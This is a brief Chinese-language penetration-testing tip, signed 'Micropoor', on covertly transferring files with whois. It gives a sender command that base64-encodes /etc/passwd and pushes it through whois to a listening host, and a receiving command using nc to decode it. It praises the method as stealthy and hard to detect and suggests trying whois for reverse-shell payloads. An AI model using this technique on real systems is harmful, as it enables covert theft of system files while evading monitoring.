利用whois传输文件：

传输机：

root@john:~# whois -h 127.0.0.1 -p 4444 `cat /etc/passwd | base64`

接受机：

root@john:/tmp# nc -l -v -p 4444 | sed "s/ //g" | base64 -d

优点：适用于隐蔽传输。最小化被发现。
缺点：适用于传输小文件。

后者的话：whois是否同样适用于payload的反弹，是一个非常有趣的实验。

Micropoor